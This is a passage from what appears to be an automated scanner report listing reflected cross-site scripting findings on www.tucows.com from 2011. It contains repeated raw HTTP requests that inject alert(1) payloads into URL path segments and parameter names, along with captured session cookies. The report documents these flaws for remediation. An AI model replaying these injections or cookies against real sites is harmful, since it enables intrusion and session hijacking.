GET /images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7b02"-alert(1)-"7b6e920b807 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56eb6"-alert(1)-"cf82ccc0327 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c99"-alert(1)-"55fa4663456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c02"-alert(1)-"c3378b8f5df was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.30. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/aalib.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85680"-alert(1)-"13364046c33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1638"-alert(1)-"93eb7715e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94b97"-alert(1)-"7385601d3b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5955"-alert(1)-"19d51f958d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0d6e"-alert(1)-"900705e6011 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72931"-alert(1)-"45543eb08c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.36. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/ajaxlib.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c98"-alert(1)-"3068e25c5c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca30"-alert(1)-"22e394819af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
